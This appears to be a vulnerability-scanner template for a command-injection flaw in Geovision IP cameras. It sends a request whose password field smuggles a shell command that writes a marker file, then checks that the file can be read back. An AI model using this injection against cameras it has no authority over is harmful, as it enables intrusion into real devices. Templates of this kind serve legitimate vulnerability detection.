id: Geovision-rce

info:
  name: Geovision IP Camera命令执行漏洞
  author: str1am
  severity: high
  tags: Geovision,rce

requests:
  - method: GET
    path:
      - "{{BaseURL}}/PictureCatch.cgi?username=GEOVISION&password=%3Becho%204621d373cade4e83>tmp%2ftestvul.txt%3B&data_type=1&attachment=1&channel=1&secret=1&key=PWNED"
      - "{{BaseURL}}/ssi.cgi/tmp/testvul.txt"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "4621d373cade4e83"
        part: body
        condition: and
